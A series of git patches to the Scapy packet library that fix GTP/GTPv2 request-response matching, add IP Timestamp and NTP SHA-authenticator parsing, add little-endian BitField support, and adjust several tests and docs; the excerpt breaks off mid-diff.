@@ -340,17 +344,11 @@ def post_build(self, p, pay): p = struct.pack("!B", hdr_len) + p[1:] return p - def hashret(self): - return struct.pack("H", self.seq) - class GTPEchoRequest(Packet): # 3GPP TS 29.060 V9.1.0 (2009-12) name = "GTP Echo Request" - def hashret(self): - return struct.pack("H", self.seq) - class IE_Base(Packet): def extract_padding(self, pkt): @@ -868,11 +866,8 @@ class GTPEchoResponse(Packet): name = "GTP Echo Response" fields_desc = [PacketListField("IE_list", [], IE_Dispatcher)] - def hashret(self): - return struct.pack("H", self.seq) - def answers(self, other): - return self.seq == other.seq + return isinstance(other, GTPEchoRequest) class GTPCreatePDPContextRequest(Packet): @@ -883,20 +878,14 @@ class GTPCreatePDPContextRequest(Packet): IE_NotImplementedTLV(ietype=135, length=15, data=RandString(15))], # noqa: E501 IE_Dispatcher)] - def hashret(self): - return struct.pack("H", self.seq) - class GTPCreatePDPContextResponse(Packet): # 3GPP TS 29.060 V9.1.0 (2009-12) name = "GTP Create PDP Context Response" fields_desc = [PacketListField("IE_list", [], IE_Dispatcher)] - def hashret(self): - return struct.pack("H", self.seq) - def answers(self, other): - return self.seq == other.seq + return isinstance(other, GTPCreatePDPContextRequest) class GTPUpdatePDPContextRequest(Packet): @@ -924,17 +913,14 @@ class GTPUpdatePDPContextRequest(Packet): IE_PrivateExtension()], IE_Dispatcher)] - def hashret(self): - return struct.pack("H", self.seq) - class GTPUpdatePDPContextResponse(Packet): # 3GPP TS 29.060 V9.1.0 (2009-12) name = "GTP Update PDP Context Response" fields_desc = [PacketListField("IE_list", None, IE_Dispatcher)] - def hashret(self): - return struct.pack("H", self.seq) + def answers(self, other): + return isinstance(other, GTPUpdatePDPContextRequest) class GTPErrorIndication(Packet): diff --git a/test/contrib/gtp.uts b/test/contrib/gtp.uts index 99b9f8d0102..011fb0827f9 100644 --- a/test/contrib/gtp.uts +++ b/test/contrib/gtp.uts @@ -57,6 +57,12 @@ h = "fa163e7da573fa163e43f8e708004500008400000000fd119f520a0a05010a0a05020868086 gtp = Ether(hex_bytes(h)) gtp[GTP_U_Header].ExtHdrLen == 2 and gtp[GTP_U_Header].extraPadding == b'\x00\x00\x00\x00' and gtp[GTP_U_Header][IP].src == '10.10.8.2' and gtp[GTP_U_Header][IP][ICMP].type == 0 += GTPEchoResponse matches GTPEchoRequest by seq +req = GTPHeader(seq=12345)/GTPEchoRequest() +res = GTPHeader(seq=12345)/GTPEchoResponse() +assert req.hashret() == res.hashret() +assert res.answers(req) + = GTPCreatePDPContextRequest(), basic instantiation gtp = IP(src="127.0.0.1", dst="127.0.0.1")/UDP(dport=2123, sport=2123)/GTPHeader(teid=2807)/GTPCreatePDPContextRequest() gtp.dport == 2123 and gtp.teid == 2807 and len(gtp.IE_list) == 5 From a1d31551557399e1ff9c64f9879e4026a655c767 Mon Sep 17 00:00:00 2001 From: Kirill Spitsyn Date: Mon, 14 Oct 2019 14:40:14 -0700 Subject: [PATCH 0226/1632] Improve request/response matching for GTPv2 packets. Before this commit, `GTPHeader.answers` was calling to its payload's `answers` method, which is not implemented for any of the possible payloads for `GTPHeader`. Thus, the default implementation from `Packet.answers` was used, which returns `False` if packet subclasses doesn't match, as is the case with e.g. `GTPV2EchoRequest` and `GTPV2EchoResponse` classes. That, in particular, was preventing `sr*` functions to match GTPv2 requests and responses. This commit changes the `GTPHeader.answers` method to consider messages with the same sequence number to be a request/response pair. This is true most of the time, but can be wrong in these cases: * Ideally `GTPHeader.answers` should check that the packet on which `answers` was called is a "*Request" or a "*Command", and that the other packet is of the corresponding response message type. * In the case of "triggered response" messages there can be three messages with the same sequence number: a command, a request message triggered by the command, and a response to the triggered message. * The case of piggybacked messages seems to be different: if I'm reading the spec correctly, a response to a piggybacked message will have the sequence number of the piggybacked request, not the message the request was piggybacked to. --- scapy/contrib/gtp.py | 13 +++++++--- scapy/contrib/gtp_v2.py | 53 ++++++++++++++++++++++++++++------------- test/contrib/gtp_v2.uts | 16 ++++++++++--- 3 files changed, 60 insertions(+), 22 deletions(-) diff --git a/scapy/contrib/gtp.py b/scapy/contrib/gtp.py index 4ef70479b19..07d36e3a518 100644 --- a/scapy/contrib/gtp.py +++ b/scapy/contrib/gtp.py @@ -222,9 +222,16 @@ class GTPHeader(Packet): ByteEnumField("gtp_type", None, GTPmessageType), ShortField("length", None), IntField("teid", 0), - ConditionalField(XBitField("seq", 0, 16), lambda pkt:pkt.E == 1 or pkt.S == 1 or pkt.PN == 1), # noqa: E501 - ConditionalField(ByteField("npdu", 0), lambda pkt:pkt.E == 1 or pkt.S == 1 or pkt.PN == 1), # noqa: E501 - ConditionalField(ByteEnumField("next_ex", 0, ExtensionHeadersTypes), lambda pkt:pkt.E == 1 or pkt.S == 1 or pkt.PN == 1), ] # noqa: E501 + ConditionalField( + XBitField("seq", 0, 16), + lambda pkt:pkt.E == 1 or pkt.S == 1 or pkt.PN == 1), + ConditionalField( + ByteField("npdu", 0), + lambda pkt:pkt.E == 1 or pkt.S == 1 or pkt.PN == 1), + ConditionalField( + ByteEnumField("next_ex", 0, ExtensionHeadersTypes), + lambda pkt:pkt.E == 1 or pkt.S == 1 or pkt.PN == 1), + ] def post_build(self, p, pay): p += pay diff --git a/scapy/contrib/gtp_v2.py b/scapy/contrib/gtp_v2.py index cecb72da108..fb76dada861 100755 --- a/scapy/contrib/gtp_v2.py +++ b/scapy/contrib/gtp_v2.py @@ -247,7 +247,7 @@ } -class GTPHeader(Packet): +class GTPHeader(gtp.GTPHeader): # 3GPP TS 29.060 V9.1.0 (2009-12) # without the version name = "GTP v2 Header" @@ -265,21 +265,6 @@ class GTPHeader(Packet): ByteField("SPARE", 0) ] - def post_build(self, p, pay): - p += pay - if self.length is None: - tmp_len = len(p) - 8 - p = p[:2] + struct.pack("!H", tmp_len) + p[4:] - return p - - def hashret(self): - return struct.pack("B", self.version) + self.payload.hashret() - - def answers(self, other): - return (isinstance(other, GTPHeader) and - self.version == other.version and - self.payload.answers(other.payload)) - class IE_IP_Address(gtp.IE_Base): name = "IE IP Address" @@ -1530,6 +1515,9 @@ class GTPV2EchoRequest(GTPV2Command): class GTPV2EchoResponse(GTPV2Command): name = "GTPv2 Echo Response" + def answers(self, other): + return isinstance(other, GTPV2EchoRequest) + class GTPV2CreateSessionRequest(GTPV2Command): name = "GTPv2 Create Session Request" @@ -1538,6 +1526,9 @@ class GTPV2CreateSessionRequest(GTPV2Command): class GTPV2CreateSessionResponse(GTPV2Command): name = "GTPv2 Create Session Response" + def answers(self, other): + return isinstance(other, GTPV2CreateSessionRequest) + class GTPV2DeleteSessionRequest(GTPV2Command): name = "GTPv2 Delete Session Request" @@ -1546,6 +1537,9 @@ class GTPV2DeleteSessionRequest(GTPV2Command): class GTPV2DeleteSessionResponse(GTPV2Command): name = "GTPv2 Delete Session Request" + def answers(self, other): + return isinstance(other, GTPV2DeleteSessionRequest) + class GTPV2ModifyBearerCommand(GTPV2Command): name = "GTPv2 Modify Bearer Command" @@ -1582,6 +1576,9 @@ class GTPV2ModifyBearerRequest(GTPV2Command): class GTPV2ModifyBearerResponse(GTPV2Command): name = "GTPv2 Modify Bearer Response" + def answers(self, other): + return isinstance(other, GTPV2ModifyBearerRequest) + class GTPV2CreateBearerRequest(GTPV2Command): name = "GTPv2 Create Bearer Request" @@ -1590,6 +1587,9 @@ class GTPV2CreateBearerRequest(GTPV2Command): class GTPV2CreateBearerResponse(GTPV2Command): name = "GTPv2 Create Bearer Response" + def answers(self, other): + return isinstance(other, GTPV2CreateBearerRequest) + class GTPV2UpdateBearerRequest(GTPV2Command): name = "GTPv2 Update Bearer Request" @@ -1598,6 +1598,9 @@ class GTPV2UpdateBearerRequest(GTPV2Command): class GTPV2UpdateBearerResponse(GTPV2Command): name = "GTPv2 Update Bearer Response" + def answers(self, other): + return isinstance(other, GTPV2UpdateBearerRequest) + class GTPV2DeleteBearerRequest(GTPV2Command): name = "GTPv2 Delete Bearer Request" @@ -1630,6 +1633,9 @@ class GTPV2ContextRequest(GTPV2Command): class GTPV2ContextResponse(GTPV2Command): name = "GTPv2 Context Response" + def answers(self, other): + return isinstance(other, GTPV2ContextRequest) + class GTPV2ContextAcknowledge(GTPV2Command): name = "GTPv2 Context Acknowledge" @@ -1642,6 +1648,12 @@ class GTPV2CreateIndirectDataForwardingTunnelRequest(GTPV2Command): class GTPV2CreateIndirectDataForwardingTunnelResponse(GTPV2Command): name = "GTPv2 Create Indirect Data Forwarding Tunnel Response" + def answers(self, other): + return isinstance( + other, + GTPV2CreateIndirectDataForwardingTunnelRequest + ) + class GTPV2DeleteIndirectDataForwardingTunnelRequest(GTPV2Command): name = "GTPv2 Delete Indirect Data Forwarding Tunnel Request" @@ -1650,6 +1662,12 @@ class GTPV2DeleteIndirectDataForwardingTunnelRequest(GTPV2Command): class GTPV2DeleteIndirectDataForwardingTunnelResponse(GTPV2Command): name = "GTPv2 Delete Indirect Data Forwarding Tunnel Response" + def answers(self, other): + return isinstance( + other, + GTPV2DeleteIndirectDataForwardingTunnelRequest + ) + class GTPV2ReleaseBearerRequest(GTPV2Command): name = "GTPv2 Release Bearer Request" @@ -1658,6 +1676,9 @@ class GTPV2ReleaseBearerRequest(GTPV2Command): class GTPV2ReleaseBearerResponse(GTPV2Command): name = "GTPv2 Release Bearer Response" + def answers(self, other): + return isinstance(other, GTPV2ReleaseBearerRequest) + class GTPV2DownlinkDataNotif(GTPV2Command): name = "GTPv2 Download Data Notification" diff --git a/test/contrib/gtp_v2.uts b/test/contrib/gtp_v2.uts index beff54fef2b..328ec23fe5f 100644 --- a/test/contrib/gtp_v2.uts +++ b/test/contrib/gtp_v2.uts @@ -412,16 +412,26 @@ ie = IE_MMBR(ietype='Max MBR/APN-AMBR (MMBR)', length=8, uplink_rate=5696, downlink_rate=21000) ie.ietype == 161 and ie.uplink_rate == 5696 and ie.downlink_rate == 21000 -= GTPHeader answers to not GTPHeader instance += GTPHeader isn't an answer to not GTPHeader instance GTPHeader(gtp_type=2).answers(Ether()) == False += GTPHeader is an answer to a message with the same sequence number +GTPHeader(seq=42).answers(GTPHeader(seq=42)) == True + += GTPHeader isn't an answer to a message with a different sequence number +GTPHeader(seq=42).answers(GTPHeader(seq=24)) == False + += GTPV2EchoResponse answers +assert (GTPHeader(seq=1)/GTPV2EchoResponse()).answers(GTPHeader(seq=1)/GTPV2EchoRequest()) +assert not (GTPHeader(seq=1)/GTPV2EchoResponse()).answers(GTPHeader(seq=1)/GTPV2EchoResponse()) + = GTPHeader post_build gtp = GTPHeader(gtp_type="create_session_req") / ("X"*32) gtp.show2() = GTPHeader hashret -req = GTPHeader(gtp_type="create_session_req") / ("X"*32) -res = GTPHeader(gtp_type="create_session_res") / ("Y"*32) +req = GTPHeader(gtp_type="create_session_req", seq=1) / ("X"*32) +res = GTPHeader(gtp_type="create_session_res", seq=1) / ("Y"*32) req.hashret() == res.hashret() = IE_NotImplementedTLV From 0599d9d7a9e2965ed5f7d131d45a1f1932cdf840 Mon Sep 17 00:00:00 2001 From: IrinaPopa Date: Thu, 6 Feb 2020 14:00:59 +0200 Subject: [PATCH 0227/1632] add IPOption_Timestamp from rfc791 --- scapy/layers/inet.py | 22 ++++++++++++++++++++++ test/regression.uts | 10 ++++++++++ 2 files changed, 32 insertions(+) diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index 1310eeb6afb..20f2299dd6b 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -216,6 +216,28 @@ class IPOption_Traceroute(IPOption): IPField("originator_ip", "0.0.0.0")] +class IPOption_Timestamp(IPOption): + name = "IP Option Timestamp" + optclass = 2 + option = 4 + fields_desc = [_IPOption_HDR, + ByteField("length", None), + ByteField("pointer", 9), + BitField("oflw", 0, 4), + BitEnumField("flg", 1, 4, + {0: "timestamp_only", + 1: "timestamp_and_ip_addr", + 3: "prespecified_ip_addr"}), + ConditionalField(IPField("internet_address", "0.0.0.0"), + lambda pkt: pkt.flg != 0), + IntField('timestamp', 0)] + + def post_build(self, p, pay): + if self.length is None: + p = p[:1] + struct.pack("!B", len(p)) + p[2:] + return p + pay + + class IPOption_Address_Extension(IPOption): name = "IP Option Address Extension" copy_flag = 1 diff --git a/test/regression.uts b/test/regression.uts index 9541b08269f..e0a7a824437 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -2409,6 +2409,12 @@ assert(r == b'\x00') r = raw(IPOption_LSRR(routers=["1.2.3.4","5.6.7.8"])) r assert(r == b'\x83\x0b\x04\x01\x02\x03\x04\x05\x06\x07\x08') +r = raw(IPOption_Timestamp(internet_address='192.168.15.7', timestamp=11223344)) +r +assert(r == b'D\x0c\t\x01\xc0\xa8\x0f\x07\x00\xabA0') +r = raw(IPOption_Timestamp(flg=0, length=8)) +r +assert(r == b'D\x08\t\x00\x00\x00\x00\x00') = IP options individual dissection ~ IP options @@ -8082,6 +8088,10 @@ pkt = IP(len=54, ihl=6, options=[IPOption_RR()]) / TCP() / ("A" * 10) bpkt = IP(raw(pkt)) assert bpkt.chksum == 0x70bc and bpkt.payload.chksum == 0x4b2c +pkt = IP(options=[IPOption_Timestamp()]) / TCP() / ("A" * 10) +bpkt = IP(raw(pkt)) +assert bpkt.chksum == 0x2caa and bpkt.payload.chksum == 0x4b2c + pkt = IP() / UDP() bpkt = IP(raw(pkt)) assert bpkt.chksum == 0x7cce and bpkt.payload.chksum == 0x0172 From 9d43a4d07b514d0a016414878e125a67d4a39bdf Mon Sep 17 00:00:00 2001 From: Chamaeleon- Date: Mon, 20 Jul 2020 10:21:20 +0200 Subject: [PATCH 0228/1632] Update utils.corrupt_bits() and corrupt_bytes() docs fixes #2721 --- scapy/utils.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/scapy/utils.py b/scapy/utils.py index 1f5aa8eb4c1..e81fac0ac10 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -891,7 +891,7 @@ def load_object(fname): @conf.commands.register def corrupt_bytes(s, p=0.01, n=None): - """Corrupt a given percentage or number of bytes from a string""" + """Corrupt a given percentage (at least one byte) or number of bytes from a string""" s = array.array("B", bytes_encode(s)) s_len = len(s) if n is None: @@ -903,7 +903,7 @@ def corrupt_bytes(s, p=0.01, n=None): @conf.commands.register def corrupt_bits(s, p=0.01, n=None): - """Flip a given percentage or number of bits from a string""" + """Flip a given percentage (at least one bit) or number of bits from a string""" s = array.array("B", bytes_encode(s)) s_len = len(s) * 8 if n is None: From 8d62ed34a8dad2a33c0c942482212d1b22297bca Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Mon, 20 Jul 2020 13:13:29 +0200 Subject: [PATCH 0229/1632] Ensure that self.src_addr exists Setting the value to None ensures that calls to other methods won't fail. If no IPv6 adress is found, a warning message is still displayed. --- scapy/layers/dhcp6.py | 1 + 1 file changed, 1 insertion(+) diff --git a/scapy/layers/dhcp6.py b/scapy/layers/dhcp6.py index 0b05949f780..2c8a666cb50 100644 --- a/scapy/layers/dhcp6.py +++ b/scapy/layers/dhcp6.py @@ -1533,6 +1533,7 @@ def norm_list(val, param_name): #### # Find the source address we will use + self.src_addr = None try: addr = next(x for x in in6_getifaddr() if x[2] == iface and in6_islladdr(x[0])) # noqa: E501 except (StopIteration, RuntimeError): From c6f5f130b64fba5296e9386a1dbb9ab38ffc415e Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Mon, 20 Jul 2020 14:47:16 +0200 Subject: [PATCH 0230/1632] Minor flake8 fixes --- scapy/utils.py | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/scapy/utils.py b/scapy/utils.py index e81fac0ac10..be3b6343fda 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -891,7 +891,10 @@ def load_object(fname): @conf.commands.register def corrupt_bytes(s, p=0.01, n=None): - """Corrupt a given percentage (at least one byte) or number of bytes from a string""" + """ + Corrupt a given percentage (at least one byte) or number of bytes + from a string + """ s = array.array("B", bytes_encode(s)) s_len = len(s) if n is None: @@ -903,7 +906,10 @@ def corrupt_bytes(s, p=0.01, n=None): @conf.commands.register def corrupt_bits(s, p=0.01, n=None): - """Flip a given percentage (at least one bit) or number of bits from a string""" + """ + Flip a given percentage (at least one bit) or number of bits + from a string + """ s = array.array("B", bytes_encode(s)) s_len = len(s) * 8 if n is None: From fff70b332c853abf2cf057cf3dd7ab3804b88cd6 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Mon, 20 Jul 2020 13:27:46 +0200 Subject: [PATCH 0231/1632] Do no run Linux specific tests on other OSes --- test/configs/bsd.utsc | 6 +++++- test/configs/solaris.utsc | 6 +++++- 2 files changed, 10 insertions(+), 2 deletions(-) diff --git a/test/configs/bsd.utsc b/test/configs/bsd.utsc index 4f90de423ae..5f74a4760bb 100644 --- a/test/configs/bsd.utsc +++ b/test/configs/bsd.utsc @@ -9,7 +9,11 @@ ], "remove_testfiles": [ "test/linux.uts", - "test/windows.uts" + "test/windows.uts", + "test/contrib/automotive/ecu_am.uts", + "test/contrib/automotive/gm/gmlanutils.uts", + "test/contrib/isotp.uts", + "test/contrib/isotpscan.uts" ], "onlyfailed": true, "preexec": { diff --git a/test/configs/solaris.utsc b/test/configs/solaris.utsc index 5d8cb4e3879..fdcc035dfca 100644 --- a/test/configs/solaris.utsc +++ b/test/configs/solaris.utsc @@ -10,7 +10,11 @@ "remove_testfiles": [ "test/linux.uts", "test/bpf.uts", - "test/windows.uts" + "test/windows.uts", + "test/contrib/automotive/ecu_am.uts", + "test/contrib/automotive/gm/gmlanutils.uts", + "test/contrib/isotp.uts", + "test/contrib/isotpscan.uts" ], "onlyfailed": true, "preexec": { From 553c242662e1f12a244a3bb9b6dabc40a9e416ad Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 21 Jul 2020 15:08:56 +0200 Subject: [PATCH 0232/1632] Fix cryptography 3.0 test --- test/cert.uts | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/test/cert.uts b/test/cert.uts index 49e80ca8905..12eadfae69f 100644 --- a/test/cert.uts +++ b/test/cert.uts @@ -69,9 +69,9 @@ z.pubkey.public_numbers().x == 1047486561747694969523700054215665182527042630001 = PubKeyRSA class : Generate without modulus t = PubKeyRSA() -t.fill_and_store(modulus=None, pubExp=32769, modulusLen=1024) +t.fill_and_store(modulus=None, pubExp=65537, modulusLen=1024) assert t.pubkey.key_size == 1024 -assert t.pubkey.public_numbers().e == 32769 +assert t.pubkey.public_numbers().e == 65537 ########### PrivKey class ############################################### From f0401152c087057801ddbdda8a6ef2ffe77fdb78 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Tue, 21 Jul 2020 16:56:09 +0200 Subject: [PATCH 0233/1632] Backup & restore conf.route.routes --- test/regression.uts | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/test/regression.uts b/test/regression.uts index e0a7a824437..4e45d5c34fe 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -11476,6 +11476,7 @@ len(r4.routes) == len_r4 dummy_interface = get_dummy_interface() +bck_conf_route_routes = conf.route.routes conf.route.routes = [ (0, 0, '172.21.230.1', dummy_interface, '172.21.230.10', 1), # 0.0.0.0 / 0.0.0.0 == 255.255.255.255 (2851995648, 4294901760, '0.0.0.0', dummy_interface, '172.21.230.10', 1), # 169.254.0.0 / 255.255.0.0 == 169.254.255.255 @@ -11487,7 +11488,7 @@ conf.route.routes = [ ] assert sorted(conf.route.get_if_bcast(dummy_interface)) == sorted(['169.254.255.255', '172.21.230.255', '239.255.255.255']) -conf.route.resync() +conf.route.routes = bck_conf_route_routes ############ ############ From 625ec8bec35f3e0036f2dfa542a5595ed180b82d Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Thu, 23 Jul 2020 09:36:32 +0200 Subject: [PATCH 0234/1632] Support SHA* based authenticators --- scapy/layers/ntp.py | 6 +++--- test/regression.uts | 6 ++++++ 2 files changed, 9 insertions(+), 3 deletions(-) diff --git a/scapy/layers/ntp.py b/scapy/layers/ntp.py index eb84c4d6d16..21da95c88ef 100644 --- a/scapy/layers/ntp.py +++ b/scapy/layers/ntp.py @@ -452,10 +452,10 @@ def guess_payload_class(self, payload): """ plen = len(payload) - if plen > _NTP_AUTH_MD5_TAIL_SIZE: - return NTPExtensions - elif plen == _NTP_AUTH_MD5_TAIL_SIZE: + if plen - 4 in [16, 20, 32, 64]: # length of MD5, SHA1, SHA256, SHA512 return NTPAuthenticator + elif plen > _NTP_AUTH_MD5_TAIL_SIZE: + return NTPExtensions return Packet.guess_payload_class(self, payload) diff --git a/test/regression.uts b/test/regression.uts index 4e45d5c34fe..20e8e7c1599 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -9579,6 +9579,12 @@ assert(p.version == 4) assert(p.mode == 3) assert(p.stratum == 2) += NTPAuthenticator + +s = hex_bytes("000c2962f268d094666d23750800450000640db640004011a519c0a80364c0a80305a51e007b0050731a2300072000000000000000000000000000000000000000000000000000000000000000000000000052c7bc1dda64b97d0000000bcdc3825dbf6b7ad02886ff45aa8b2eaf7ac78bc1") +p = Ether(s) +assert NTPAuthenticator in p and p[NTPAuthenticator].key_id == 3452142173 + ############ ############ From 0757fabbbccb5a3a173ef69cd8018d4442dbb8aa Mon Sep 17 00:00:00 2001 From: Pr Date: Thu, 23 Jul 2020 17:23:50 +0200 Subject: [PATCH 0235/1632] correct doc in accordance to code cf https://github.com/secdev/scapy/issues/2729 --- doc/scapy/layers/automotive.rst | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/doc/scapy/layers/automotive.rst b/doc/scapy/layers/automotive.rst index 46deb741e6d..7b19e3b1719 100644 --- a/doc/scapy/layers/automotive.rst +++ b/doc/scapy/layers/automotive.rst @@ -59,7 +59,7 @@ Send and receive a message over Linux SocketCAN:: load_layer('can') load_contrib('cansocket') - socket = CANSocket(iface='can0') + socket = CANSocket(channel='can0') packet = CAN(identifier=0x123, data=b'01020304') socket.send(packet) @@ -75,7 +75,7 @@ Send a message over a Vector CAN-Interface:: load_contrib('cansocket') from can.interfaces.vector import VectorBus - socket = CANSocket(iface=VectorBus(0, bitrate=1000000)) + socket = CANSocket(channel=VectorBus(0, bitrate=1000000)) packet = CAN(identifier=0x123, data=b'01020304') socket.send(packet) From 23d3f50e036dc753b784251eeaf19f8b4ea938b4 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 27 Jul 2020 13:00:33 +0200 Subject: [PATCH 0236/1632] Try to catch issue #2736 --- test/tools/isotpscanner.uts | 12 +----------- test/tools/obdscanner.uts | 4 ---- 2 files changed, 1 insertion(+), 15 deletions(-) diff --git a/test/tools/isotpscanner.uts b/test/tools/isotpscanner.uts index 701448540f6..223f1b412c6 100644 --- a/test/tools/isotpscanner.uts +++ b/test/tools/isotpscanner.uts @@ -126,10 +126,9 @@ assert expected_output in plain_str(std_err) = Test show help result = subprocess.Popen([sys.executable, "scapy/tools/automotive/isotpscanner.py", "--help"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) -std_out, std_err = result.communicate() +std_out, _ = result.communicate() expected_output = plain_str(b'Scan for open ISOTP-Sockets.') -assert not std_err assert result.wait() == 0 assert expected_output in plain_str(std_out) @@ -268,9 +267,6 @@ assert 0 == send_returncode assert returncode1 == 0 assert returncode2 == 0 -assert std_err1 == None -assert std_err2 == None - for out in expected_output: assert plain_str(out) in plain_str(std_out1 + std_out2) @@ -302,9 +298,6 @@ assert 0 == send_returncode assert returncode1 == 0 assert returncode2 == 0 -assert std_err1 == None -assert std_err2 == None - for out in expected_output: assert plain_str(out) in plain_str(std_out1 + std_out2) @@ -338,9 +331,6 @@ assert returncode1 == 0 == returncode2 expected_output = [b'sid=0x601', b'did=0x700', b'padding=False', b'extended_addr=0xbb', b'extended_rx_addr=0xaa'] -assert std_err1 == None -assert std_err2 == None - for out in expected_output: assert plain_str(out) in plain_str(std_out1 + std_out2) diff --git a/test/tools/obdscanner.uts b/test/tools/obdscanner.uts index 2a200c54938..a221d8f65b3 100644 --- a/test/tools/obdscanner.uts +++ b/test/tools/obdscanner.uts @@ -136,7 +136,6 @@ assert expected_output in plain_str(std_err) result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py", "--help"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) assert result.wait() == 0 std_out, std_err = result.communicate() -assert not std_err expected_output = plain_str(b'Scan for all possible obd service classes and their subfunctions.') assert expected_output in plain_str(std_out) @@ -245,7 +244,6 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, 0x7e8, 0x7e0, basecls=OBD, tester.send(b"\x01\xff\xff\xff\xff") sim.join(timeout=10) expected_output = ["5 requests were sent, 4 answered", "2 requests were sent, 1 answered", "1 requests were sent, 1 answered"] - assert std_err1 == b'' and std_err2 == b'' for out in expected_output: assert bytes_encode(out) in bytes_encode(std_out1) or bytes_encode(out) in bytes_encode(std_out2) @@ -291,7 +289,6 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, 0x7e8, 0x7e0, basecls=OBD, tester.send(b"\x01\xff\xff\xff\xff") sim.join(timeout=10) expected_output = ["5 requests were sent, 4 answered"] - assert std_err1 == b'' and std_err2 == b'' for out in expected_output: assert bytes_encode(out) in bytes_encode(std_out1) or bytes_encode(out) in bytes_encode(std_out2) @@ -319,7 +316,6 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, 0x7e8, 0x7e0, basecls=OBD, finally: tester.send(b"\x01\xff\xff\xff\xff") sim.join(timeout=10) - assert std_err1 == b'' and std_err2 == b'' expected_output = ["256 requests were sent", "1 requests were sent, 1 answered"] for out in expected_output: assert bytes_encode(out) in bytes_encode(std_out1) or bytes_encode(out) in bytes_encode(std_out2) From 63b9afb0867ff26afaad3cd34eccde3fab13cb00 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Thu, 23 Jul 2020 21:38:40 +0200 Subject: [PATCH 0237/1632] 802.11 IEs + BitField complex LE support --- scapy/fields.py | 173 ++++++++++------ scapy/layers/bluetooth.py | 19 +- scapy/layers/dot11.py | 334 +++++++++++++++++++++++++++---- scapy/modules/krack/automaton.py | 15 +- test/regression.uts | 128 +++++++++++- tox.ini | 2 +- 6 files changed, 534 insertions(+), 137 deletions(-) diff --git a/scapy/fields.py b/scapy/fields.py index 7cb29a5f663..f3022a09617 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -1596,23 +1596,66 @@ def m2i(self, pkt, x): class BitField(Field): - __slots__ = ["rev", "size"] + """ + Field to handle bits. + + :param name: name of the field + :param default: default value + :param size: size (in bits). If negative, Low endian + :param tot_size: size of the total group of bits (in bytes) the bitfield + is in. If negative, Low endian. + :param end_tot_size: same but for the BitField ending a group. + + Example - normal usage:: + + 0 1 2 3 + 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + | A | B | C | + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + + Fig. TestPacket + + class TestPacket(Packet): + fields_desc = [ + BitField("a", 0, 14), + BitField("b", 0, 16), + BitField("c", 0, 2), + ] + + Example - Low endian stored as 16 bits on the network:: + + x x x x x x x x x x x x x x x x + a [b] [ c ] [ a ] + + Will first get reversed during dissecion: + + x x x x x x x x x x x x x x x x + [ a ] [b] [ c ] + + class TestPacket(Packet): + fields_desc = [ + BitField("a", 0, 9, tot_size=-16), + BitField("b", 0, 2), + BitField("c", 0, 5, end_tot_size=-16) + ] + + """ + __slots__ = ["rev", "size", "tot_size", "end_tot_size"] - def __init__(self, name, default, size): + def __init__(self, name, default, size, + tot_size=0, end_tot_size=0): Field.__init__(self, name, default) - self.rev = size < 0 + self.rev = size < 0 or tot_size < 0 or end_tot_size < 0 self.size = abs(size) + if not tot_size: + tot_size = self.size // 8 + self.tot_size = abs(tot_size) + if not end_tot_size: + end_tot_size = self.size // 8 + self.end_tot_size = abs(end_tot_size) self.sz = self.size / 8. - def reverse(self, val): - if self.size == 16: - # Replaces socket.ntohs (but work on both little/big endian) - val = struct.unpack('>H', struct.pack('I', struct.pack(' 1: + s = s[:-self.end_tot_size] + s[-self.end_tot_size:][::-1] return s def getfield(self, pkt, s): @@ -1639,6 +1683,10 @@ def getfield(self, pkt, s): s, bn = s else: bn = 0 + # Apply LE if necessary + if self.rev and self.tot_size > 1: + s = s[:self.tot_size][::-1] + s[self.tot_size:] + # we don't want to process all the string nb_bytes = (self.size + bn - 1) // 8 + 1 w = s[:nb_bytes] @@ -1656,9 +1704,6 @@ def getfield(self, pkt, s): # remove low order bits b = b >> (nb_bytes * 8 - self.size - bn) - if self.rev: - b = self.reverse(b) - bn += self.size s = s[bn // 8:] bn = bn % 8 @@ -2120,7 +2165,7 @@ class FlagsField(BitField): :param name: field's name :param default: default value for the field - :param size: number of bits in the field + :param size: number of bits in the field (in bits) :param names: (list or dict) label for each flag, Least Significant Bit tag's name is written first # noqa: E501 """ ismutable = True @@ -2402,7 +2447,50 @@ def i2repr(self, pkt, x): return "%s sec" % x -class ScalingField(Field): +class _ScalingField(object): + def __init__(self, name, default, scaling=1, unit="", + offset=0, ndigits=3, fmt="B"): + self.scaling = scaling + self.unit = unit + self.offset = offset + self.ndigits = ndigits + Field.__init__(self, name, default, fmt) + + def i2m(self, pkt, x): + if x is None: + x = 0 + x = (x - self.offset) / self.scaling + if isinstance(x, float) and self.fmt[-1] != "f": + x = int(round(x)) + return x + + def m2i(self, pkt, x): + x = x * self.scaling + self.offset + if isinstance(x, float) and 